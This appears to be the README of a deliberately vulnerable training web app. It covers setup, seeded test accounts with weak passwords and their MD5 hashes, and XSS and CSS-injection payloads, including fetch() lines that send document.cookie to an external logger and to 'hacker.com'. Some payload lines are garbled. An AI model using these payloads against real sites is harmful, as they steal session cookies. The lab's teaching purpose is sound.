Uma aplicação vulnerável indicada para testes e entendimento de conceitos de segurança em Aplicações WEB
Requisitos:
NPM:
npm install
npm build
YARN:
yarn
yarn build
docker-compose up
Obs.: Caso queira subir apenas o banco de dados, é necessário comentar as demais aplicações no docker-compose.yml.
$ ./create-database.sh
Main Class -> RootApplication.java
Hash Senha | Senha | Admin | |
---|---|---|---|
bob@mail.com | 0acf4539a14b3aa27deeb4cbdf6e989f | michael | Sim |
jimi@mail.com | 061fba5bdfc076bb7362616668de87c8 | lovely | Não |
jim@mail.com | 5f4dcc3b5aa765d61d8327deb882cf99 | password | Não |
amy@mail.com | d8578edf8458ce06fbc5bb76a58c5ca4 | qwerty | Não |
janis@mail.com | 46f94c8de14fb36680850768ff1b7f2a | 123qwe | Não |
fetch('https://servidor-de-log.free.beeceptor.com/todos?cookie=' + document.cookie) fetch('http://logger.crescer.lab/?cookie=' + document.cookie)
<img src="https://github.com/sgtux/lab-crescer-cwi/raw/main/a" onerror="alert('XSS')" />
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
- CSS Injection
/hello?nome=Teste#red;margin-left:50px;background-image:url('http://localhost:8080/favicon.ico')
- expression(document.write('<iframe src="https://github.com/sgtux/lab-crescer-cwi/raw/main/ .= "http://hacker.com?cookie=' + document.cookie.escape() + " />'))
background-image: url(javascript:alert('XSS'))
https://www.mediawiki.org/wiki/Preventing_XSS_Attacks_through_CSS_Whitelisting
## Exemplos de vulnerabilidades:
- <a href="https://security.snyk.io/vuln/SNYK-JS-MATERIALIZECSS-2324800">XSS materialize-css</a>
## Referências
https://developer.mozilla.org/pt-BR/docs/Web/JavaScript/Reference/Global_Objects/eval
https://github.com/payloadbox/xss-payload-list